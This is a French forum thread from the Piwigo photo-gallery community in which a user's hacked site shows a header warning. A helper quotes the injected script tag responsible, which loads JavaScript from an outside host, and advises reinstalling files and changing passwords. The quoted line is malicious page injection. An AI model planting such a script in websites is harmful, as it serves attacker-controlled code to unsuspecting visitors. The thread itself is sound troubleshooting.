Annonce

  •  » Utilisation
  •  » [Résolu] Message d'erreur sur ma galerie...

#1 2013-05-23 14:38:24

T2002
Membre
Lyon
2009-11-07
45

[Résolu] Message d'erreur sur ma galerie...

Bonjour,

Je me suis aperçu ce midi que j'ai un warning sur le haut de toutes les pages de mon site :

Warning: Cannot modify header information - headers already sent by (output started at /homez.520/photosdegf/www/plugins/look_like_gbo2/include/manage_header.php:50) in /homez.520/photosdegf/www/include/page_header.php on line 105

Mon site : http://www.photosdetrains.fr/


Ce qui est bizarre, c'est que je n'ai fait aucune mise à jour de mon site depuis des semaines (je suis toujours en 2.4.7). Je n'ai pas activé / désactivé de plugins non plus.
Une photo est ajoutée tous les jours via le plugin Scheduler, mais je ne pense pas que ça soit ça le problème.


Ce qui est sûr, c'est que ce warning n'était pas présent hier....

Est-ce que l'un d'entre vous pourrait me dire d'où il vient et comment je pourrais m'en débarasser ?

Merci d'avance à vous !

     Vincent

Hors ligne

#2 2013-05-23 14:44:44

mistic100
Ex Equipe Piwigo
Lyon
2008-09-27
3561

Re: [Résolu] Message d'erreur sur ma galerie...

voila ce qu'on peut voir dans votre code source (c'est au tout début, ce qui cause l'erreur de header)

Code:

<script type="text/javascript" src="http://connecthostad.net/1/ad.php?id=17" name="umtx17"></script>

pour moi c'est un hack

déjà retéléchargez l'archive de Piwigo correspondant à votre version et retransferrez tous les fichiers
si ça ne change rien faites pareil pour les plugins (en prennant les bonnes versions)

puis changez vos mots de passe :)


hs: votre longue liste de mots-clefs me fait penser qu'une sorte de batch manager pour TypeT@gs ça serait beaucoup mieux que l'actuel glisser-déposer

Hors ligne

#3 2013-05-23 15:09:30

T2002
Membre
Lyon
2009-11-07
45

Re: [Résolu] Message d'erreur sur ma galerie...

Merci à vous pour la réponse très rapide !

Bon, mon mot de passe n'est pourtant pas très simple à trouver : je vais quand même le changer...
Puis je vais déjà verrouiller ma galerie. J'essayerais de tout réinstaller ce soir...

Merci !

     Vincent

Hors ligne

#4 2013-05-23 15:10:31

T2002
Membre
Lyon
2009-11-07
45

Re: [Résolu] Message d'erreur sur ma galerie...

mistic100 a écrit:

hs: votre longue liste de mots-clefs me fait penser qu'une sorte de batch manager pour TypeT@gs ça serait beaucoup mieux que l'actuel glisser-déposer

Oui, c'est vrai que le glisser/déposer devient un peu compliqué avec les nombreux mots-clés ! :-)
A++

    Vincent

Hors ligne

#5 2013-05-23 20:16:38

T2002
Membre
Lyon
2009-11-07
45

Re: [Résolu] Message d'erreur sur ma galerie...

Bonsoir,

Je pense avoir résolu mon problème.
J'ai en fait migré mon site en 2.5.1, malgré les 2 plugins pas encore compatibles : c'était plus simple et plus rapide !

Mis à part des warnings dans la partie administration pour ces 2 plugins, tout semble fonctionner correctement.

Maintenant, je vais vite changer mes mots de passe !

Merci et bonne soirée !
A++

     Vincent

Hors ligne

  •  » Utilisation
  •  » [Résolu] Message d'erreur sur ma galerie...

Pied de page des forums

Propulsé par FluxBB

github twitter newsletter Faire un don Piwigo.org © 2002-2024 · Contact